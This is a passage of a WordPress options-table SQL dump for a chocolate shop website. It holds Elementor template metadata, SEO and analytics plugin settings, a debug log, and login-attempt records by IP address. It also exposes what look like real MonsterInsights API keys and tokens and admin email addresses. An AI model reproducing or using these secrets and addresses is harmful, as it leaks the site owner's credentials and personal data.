Services\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/10/Ski-Resort-Services.png\";s:12:\"tmpl_created\";i:1508161134;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/ski-resort-services/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:207;s:16:\"popularity_index\";i:541;s:11:\"trend_index\";i:706;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:696;a:14:{s:2:\"id\";i:2462;s:5:\"title\";s:23:\"Architect &#8211; About\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2017/10/architect-–-about.png\";s:12:\"tmpl_created\";i:1508243317;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/architect-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:208;s:16:\"popularity_index\";i:329;s:11:\"trend_index\";i:282;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:697;a:14:{s:2:\"id\";i:2362;s:5:\"title\";s:26:\"Architect &#8211; Projects\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2017/10/Architect-Projects.png\";s:12:\"tmpl_created\";i:1508243335;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/architect-projects/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:209;s:16:\"popularity_index\";i:394;s:11:\"trend_index\";i:519;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:698;a:14:{s:2:\"id\";i:614;s:5:\"title\";s:25:\"Architect &#8211; Contact\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2016/12/architect-contact.jpg\";s:12:\"tmpl_created\";i:1481549169;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/architect-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:210;s:16:\"popularity_index\";i:300;s:11:\"trend_index\";i:516;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:699;a:14:{s:2:\"id\";i:2126;s:5:\"title\";s:37:\"Construction Company &#8211; Homepage\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-Home-Page.png\";s:12:\"tmpl_created\";i:1508325849;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/construction-company-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:211;s:16:\"popularity_index\";i:276;s:11:\"trend_index\";i:177;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:700;a:14:{s:2:\"id\";i:2129;s:5:\"title\";s:34:\"Construction Company &#8211; About\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-About.png\";s:12:\"tmpl_created\";i:1508325881;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/construction-company-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:212;s:16:\"popularity_index\";i:303;s:11:\"trend_index\";i:167;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:701;a:14:{s:2:\"id\";i:2135;s:5:\"title\";s:36:\"Construction Company &#8211; Contact\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2017/10/Construction-Company-Contact.png\";s:12:\"tmpl_created\";i:1508325922;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/construction-company-contact/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:213;s:16:\"popularity_index\";i:348;s:11:\"trend_index\";i:406;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:702;a:14:{s:2:\"id\";i:2094;s:5:\"title\";s:28:\"Plants Shop &#8211; Homepage\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/11/Plants-Shop-Home.png\";s:12:\"tmpl_created\";i:1509621053;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/plants-shop-homepage/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:214;s:16:\"popularity_index\";i:275;s:11:\"trend_index\";i:198;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:703;a:14:{s:2:\"id\";i:2120;s:5:\"title\";s:25:\"Plants Shop &#8211; About\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/11/Plants-Shop-About.png\";s:12:\"tmpl_created\";i:1509631820;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/plants-shop-about/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:215;s:16:\"popularity_index\";i:349;s:11:\"trend_index\";i:375;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:704;a:14:{s:2:\"id\";i:3153;s:5:\"title\";s:14:\"Halloween Pack\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/10/halloween.png\";s:12:\"tmpl_created\";i:1508950132;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/halloween-pack/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:216;s:16:\"popularity_index\";i:604;s:11:\"trend_index\";i:702;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:705;a:14:{s:2:\"id\";i:3338;s:5:\"title\";s:31:\"Black Friday &#8211; Nature Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-1.png\";s:12:\"tmpl_created\";i:1511203351;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/black-friday-nature-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:217;s:16:\"popularity_index\";i:535;s:11:\"trend_index\";i:667;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:706;a:14:{s:2:\"id\";i:3339;s:5:\"title\";s:35:\"Black Friday &#8211; Pop-Styled Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-2.png\";s:12:\"tmpl_created\";i:1511203636;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/black-friday-pop-styled-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:218;s:16:\"popularity_index\";i:478;s:11:\"trend_index\";i:601;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:707;a:14:{s:2:\"id\";i:3335;s:5:\"title\";s:31:\"Black Friday &#8211; Retail Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-4.png\";s:12:\"tmpl_created\";i:1511203246;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/black-friday-retail-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:219;s:16:\"popularity_index\";i:480;s:11:\"trend_index\";i:483;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:708;a:14:{s:2:\"id\";i:3340;s:5:\"title\";s:41:\"Black Friday &#8211; Software Product Set\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2017/11/black-friday-3.png\";s:12:\"tmpl_created\";i:1511203713;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/black-friday-software-product-set/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:220;s:16:\"popularity_index\";i:453;s:11:\"trend_index\";i:651;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:709;a:14:{s:2:\"id\";i:3517;s:5:\"title\";s:27:\"Christmas &#8211; Gift Shop\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/12/XmasThumb.png\";s:12:\"tmpl_created\";i:1513877937;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/christmas-gift-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:221;s:16:\"popularity_index\";i:533;s:11:\"trend_index\";i:680;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:710;a:14:{s:2:\"id\";i:3734;s:5:\"title\";s:28:\"Christmas &#8211; Car Agency\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v3.png\";s:12:\"tmpl_created\";i:1514197794;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/christmas-car-agency/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:222;s:16:\"popularity_index\";i:512;s:11:\"trend_index\";i:623;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:711;a:14:{s:2:\"id\";i:3764;s:5:\"title\";s:33:\"Christmas &#8211; Interior Design\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v6.png\";s:12:\"tmpl_created\";i:1514198234;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/christmas-interior-design/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:223;s:16:\"popularity_index\";i:487;s:11:\"trend_index\";i:560;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:712;a:14:{s:2:\"id\";i:3565;s:5:\"title\";s:27:\"Christmas &#8211; Tree Shop\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2017/12/XmasTreeThumb.png\";s:12:\"tmpl_created\";i:1514204382;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/christmas-tree-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:224;s:16:\"popularity_index\";i:407;s:11:\"trend_index\";i:479;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:713;a:14:{s:2:\"id\";i:3862;s:5:\"title\";s:35:\"Christmas &#8211; Design Conference\";s:9:\"thumbnail\";s:63:\"https://library.elementor.com/wp-content/uploads/2017/12/q1.png\";s:12:\"tmpl_created\";i:1514206745;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/christmas-design-conference/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:225;s:16:\"popularity_index\";i:402;s:11:\"trend_index\";i:575;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:714;a:14:{s:2:\"id\";i:3777;s:5:\"title\";s:39:\"Christmas &#8211; Snowboard Competition\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/12/cover-lib-v7.png\";s:12:\"tmpl_created\";i:1514205420;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/christmas-snowboard-competition/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:226;s:16:\"popularity_index\";i:448;s:11:\"trend_index\";i:628;s:6:\"is_pro\";i:1;s:17:\"has_page_settings\";i:0;}i:715;a:14:{s:2:\"id\";i:420;s:5:\"title\";s:11:\"Hero UI Kit\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2016/09/library-ui-kit-cover.png\";s:12:\"tmpl_created\";i:1475067229;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/hero-ui-kit/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:227;s:16:\"popularity_index\";i:20;s:11:\"trend_index\";i:103;s:6:\"is_pro\";i:0;s:17:\"has_page_settings\";i:0;}}}','no'),(145,'elementor_remote_info_feed_data','a:5:{i:0;a:5:{s:5:\"title\";s:95:\"How to Become a Better Data-Driven Marketer — Takeaways From Our Webinar With Kieran Flanagan\";s:7:\"excerpt\";s:164:\"What data do web creators need to collect on their customers, and how can they acquire it? Here are the main takeaways from our webinar with HubSpot\'s VP marketing.\";s:7:\"created\";i:1596524112;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:123:\"https://elementor.com/blog/webinar-kieran-flanagan/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:1;a:5:{s:5:\"title\";s:64:\"Principles of Website Design Every Web Professional Should Know \";s:7:\"excerpt\";s:273:\"Design is by no means an exact science. However, there are many useful principles and rules-of-thumb that can help make your projects better in terms of both usability and aesthetics. In this article, we’ll explain what design principles are and why you should know them.\";s:7:\"created\";i:1596444610;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:128:\"https://elementor.com/blog/principles-of-website-design/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:2;a:5:{s:5:\"title\";s:56:\"6 Best WooCommerce Hosting Providers for All Store Sizes\";s:7:\"excerpt\";s:249:\"Your WooCommerce hosting plays an important role in the success of your online store, ensuring that shoppers have a smooth shopping experience. To help you choose the right hosting, we\'ve collected the best WooCommerce hosting providers in one spot.\";s:7:\"created\";i:1596016613;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:119:\"https://elementor.com/blog/woocommerce-hosting/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:3;a:5:{s:5:\"title\";s:29:\"Meet Our Leaders: Chris Ayers\";s:7:\"excerpt\";s:235:\"His passion for radio led him to web creation and his eclectic interests and troubleshooting skills help to make Elementor one of the best web building tools out there. This month, we introduce to you the guy with the Elementor tattoo!\";s:7:\"created\";i:1595922268;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:128:\"https://elementor.com/blog/meet-our-leaders-chris-ayers/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}i:4;a:5:{s:5:\"title\";s:33:\"How to Find Your Web Design Niche\";s:7:\"excerpt\";s:214:\"Focusing yourself on one design niche can have several advantages, including increased productivity and profitability. In this article, we’ll discuss why you need to niche down as a web designer and how to do so.\";s:7:\"created\";i:1595490162;s:5:\"badge\";s:0:\"\";s:3:\"url\";s:116:\"https://elementor.com/blog/web-design-niche/?utm_source=wp-overview-widget&utm_medium=wp-dash&utm_campaign=news-feed\";}}','no'),(167,'recently_activated','a:0:{}','yes'),(177,'widget_elementor-library','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(178,'elementor_pro_version','2.9.4','yes'),(179,'_elementor_pro_installed_time','1527072280','yes'),(185,'elementor_fonts_manager_font_types','a:0:{}','yes'),(186,'elementor_fonts_manager_fonts','a:0:{}','yes'),(187,'elementor_scheme_color','a:4:{i:1;s:7:\"#692910\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#edd0a8\";}','yes'),(188,'elementor_scheme_typography','a:4:{i:1;a:2:{s:11:\"font_family\";s:16:\"Open Sans Hebrew\";s:11:\"font_weight\";s:3:\"600\";}i:2;a:2:{s:11:\"font_family\";s:16:\"Open Sans Hebrew\";s:11:\"font_weight\";s:3:\"400\";}i:3;a:2:{s:11:\"font_family\";s:16:\"Open Sans Hebrew\";s:11:\"font_weight\";s:3:\"400\";}i:4;a:2:{s:11:\"font_family\";s:16:\"Open Sans Hebrew\";s:11:\"font_weight\";s:3:\"500\";}}','yes'),(190,'elementor_pro_theme_builder_conditions','a:3:{s:6:\"footer\";a:1:{i:231;a:1:{i:0;s:15:\"include/general\";}}s:6:\"header\";a:1:{i:227;a:1:{i:0;s:15:\"include/general\";}}s:6:\"single\";a:2:{i:155;a:1:{i:0;s:21:\"include/singular/post\";}i:134;a:1:{i:0;s:29:\"include/singular/not_found404\";}}}','yes'),(199,'elementor_scheme_color-picker','a:8:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";i:5;s:7:\"#4054b2\";i:6;s:7:\"#23a455\";i:7;s:4:\"#000\";i:8;s:4:\"#fff\";}','yes'),(206,'nav_menu_options','a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}','yes'),(215,'elementor_debug_log','a:1:{i:0;a:8:{s:4:\"type\";s:9:\"TypeError\";s:9:\"timestamp\";s:10:\"1527085810\";s:7:\"message\";s:43:\"Cannot read property \\\'index\\\' of undefined\";s:3:\"url\";s:100:\"https://www.chocolate4u.co.il/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.2.1\";s:4:\"line\";s:1:\"3\";s:6:\"column\";s:4:\"5343\";s:12:\"customFields\";a:0:{}s:5:\"times\";i:2;}}','yes'),(218,'_elementor_scheme_last_updated','1527087580','yes'),(241,'wpseo','a:21:{s:15:\"ms_defaults_set\";b:0;s:7:\"version\";s:4:\"12.4\";s:24:\"bf_banner_2019_dismissed\";b:0;s:20:\"disableadvanced_meta\";b:1;s:19:\"onpage_indexability\";b:1;s:11:\"baiduverify\";s:0:\"\";s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:0:\"\";s:20:\"has_multiple_authors\";s:0:\"\";s:16:\"environment_type\";s:0:\"\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:18:\"enable_xml_sitemap\";b:1;s:24:\"enable_text_link_counter\";b:1;s:22:\"show_onboarding_notice\";b:1;s:18:\"first_activated_on\";i:1527088193;s:13:\"myyoast-oauth\";b:0;}','yes'),(242,'wpseo_titles','a:77:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";s:20:\"noindex-author-wpseo\";b:0;s:28:\"noindex-author-noposts-wpseo\";b:1;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:1;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:1;s:18:\"disable-attachment\";b:1;s:23:\"is-media-purge-relevant\";b:0;s:20:\"breadcrumbs-404crumb\";s:3:\"404\";s:29:\"breadcrumbs-display-blog-page\";b:0;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:17:\"ארכיון של\";s:18:\"breadcrumbs-enable\";b:1;s:16:\"breadcrumbs-home\";s:17:\"עמוד הבית\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:10:\"חיפשת\";s:15:\"breadcrumbs-sep\";s:2:\"»\";s:12:\"website_name\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:11:\"person_logo\";s:0:\"\";s:14:\"person_logo_id\";i:0;s:22:\"alternate_website_name\";s:0:\"\";s:12:\"company_logo\";s:0:\"\";s:15:\"company_logo_id\";i:0;s:12:\"company_name\";s:0:\"\";s:17:\"company_or_person\";s:7:\"company\";s:25:\"company_or_person_user_id\";b:0;s:17:\"stripcategorybase\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:23:\"display-metabox-pt-post\";b:1;s:23:\"post_types-post-maintax\";i:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:23:\"display-metabox-pt-page\";b:1;s:23:\"post_types-page-maintax\";i:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:29:\"display-metabox-pt-attachment\";b:1;s:29:\"post_types-attachment-maintax\";i:0;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:28:\"display-metabox-tax-category\";b:1;s:20:\"noindex-tax-category\";b:1;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:28:\"display-metabox-tax-post_tag\";b:1;s:20:\"noindex-tax-post_tag\";b:1;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:31:\"display-metabox-tax-post_format\";b:0;s:23:\"noindex-tax-post_format\";b:1;s:23:\"title-elementor_library\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:26:\"metadesc-elementor_library\";s:0:\"\";s:25:\"noindex-elementor_library\";b:1;s:26:\"showdate-elementor_library\";b:0;s:36:\"display-metabox-pt-elementor_library\";b:1;s:36:\"post_types-elementor_library-maintax\";i:0;}','yes'),(243,'wpseo_social','a:19:{s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:19:\"og_default_image_id\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:21:\"og_frontpage_image_id\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:19:\"summary_large_image\";s:11:\"youtube_url\";s:0:\"\";s:13:\"wikipedia_url\";s:0:\"\";s:10:\"fbadminapp\";s:0:\"\";}','yes'),(244,'wpseo_flush_rewrite','1','yes'),(333,'monsterinsights_usage_tracking_config','a:6:{s:3:\"day\";i:5;s:4:\"hour\";i:21;s:6:\"minute\";i:42;s:6:\"second\";i:8;s:6:\"offset\";i:510128;s:8:\"initsend\";i:1527889328;}','yes'),(334,'monsterinsights_over_time','a:3:{s:17:\"installed_version\";s:5:\"7.0.6\";s:14:\"installed_date\";i:1527095246;s:13:\"installed_pro\";b:0;}','yes'),(335,'monsterinsights_db_version','6.2.0','yes'),(336,'monsterinsights_settings_version','7.0.0','yes'),(337,'monsterinsights_current_version','7.0.6','yes'),(338,'monsterinsights_settings','a:25:{s:17:\"analytics_profile\";s:0:\"\";s:22:\"analytics_profile_code\";s:0:\"\";s:14:\"manual_ua_code\";s:0:\"\";s:26:\"track_internal_as_outbound\";i:0;s:23:\"track_internal_as_label\";s:0:\"\";s:14:\"track_outbound\";i:1;s:14:\"allow_tracking\";i:0;s:13:\"tracking_mode\";s:9:\"analytics\";s:11:\"events_mode\";s:2:\"js\";s:12:\"demographics\";i:1;s:12:\"ignore_users\";a:2:{i:0;s:13:\"administrator\";i:1;s:6:\"editor\";}s:19:\"dashboards_disabled\";i:0;s:13:\"anonymize_ips\";i:0;s:17:\"track_download_as\";s:5:\"event\";s:19:\"extensions_of_files\";s:30:\"doc,exe,js,pdf,ppt,tgz,zip,xls\";s:18:\"subdomain_tracking\";s:0:\"\";s:16:\"tag_links_in_rss\";i:0;s:12:\"allow_anchor\";i:0;s:16:\"add_allow_linker\";i:0;s:25:\"enhanced_link_attribution\";i:1;s:11:\"custom_code\";s:0:\"\";s:10:\"debug_mode\";i:0;s:14:\"anonymous_data\";i:0;s:13:\"save_settings\";a:0:{}s:12:\"view_reports\";a:0:{}}','yes'),(339,'_amn_mi-lite_last_checked','1596585600','yes'),(341,'monsterinsights_site_tt','f1521c1b8dec04005bf42d11def57e36b26f3d19a85b67f5fbbcd8818e6781098463652da56e3b09e05bd000260a68e70959faacd3a903194390fae2b69c26b7','yes'),(342,'monsterinsights_site_profile','a:9:{s:3:\"key\";s:128:\"003964b8ac05ab6cd3f9b6898f9aea536f6f2360eef809c1c4433973f9df3e5ef1171fd91a85fe22aa4b6d4b3e4b6531ad07b57cd20356ffd4963a623aa54487\";s:5:\"token\";s:128:\"b5e1ac524867e5f2cb47f8e47ff1b47c82250c9ba2768e83c623c4149c840bf4821fc5c770be4fe98d0cf7ec6f043359b93dd4e3dd3719a1b951b8237c763380\";s:2:\"ua\";s:14:\"UA-119774396-1\";s:8:\"viewname\";s:14:\"UA-119774396-1\";s:1:\"a\";s:9:\"119774396\";s:1:\"w\";s:9:\"177155546\";s:1:\"p\";s:9:\"175903710\";s:7:\"siteurl\";s:29:\"https://www.chocolate4u.co.il\";s:6:\"neturl\";s:39:\"https://www.chocolate4u.co.il/wp-admin/\";}','yes'),(365,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:19:\"shmulik@shmul.co.il\";s:7:\"version\";s:5:\"5.1.6\";s:9:\"timestamp\";i:1591856649;}','no'),(442,'WPLANG','he_IL','yes'),(443,'new_admin_email','yaaripe@gmail.com','yes'),(448,'elementor_pro_tracker_notice','1','yes'),(449,'elementor_allow_tracking','no','yes'),(450,'elementor_tracker_notice','1','yes'),(509,'wesafe_retries','a:1:{s:14:\"81.177.139.211\";i:1;}','no'),(510,'wesafe_retries_valid','a:1:{s:14:\"81.177.139.211\";i:1590013048;}','no'),(552,'wesafe_lockouts','a:0:{}','yes'),(553,'wesafe_logged','a:557:{s:11:\"5.188.62.11\";a:1:{s:8:\"chocoded\";i:1;}s:13:\"58.214.239.53\";a:1:{s:3:\"www\";i:2;}s:13:\"122.224.36.28\";a:1:{s:3:\"www\";i:1;}s:13:\"61.191.252.74\";a:1:{s:3:\"www\";i:1;}s:12:\"220.225.7.88\";a:1:{s:3:\"www\";i:1;}s:13:\"58.58.135.158\";a:1:{s:3:\"www\";i:1;}s:13:\"58.216.224.59\";a:1:{s:3:\"www\";i:1;}s:13:\"124.65.64.174\";a:1:{s:3:\"www\";i:2;}s:15:\"220.179.250.175\";a:1:{s:3:\"ww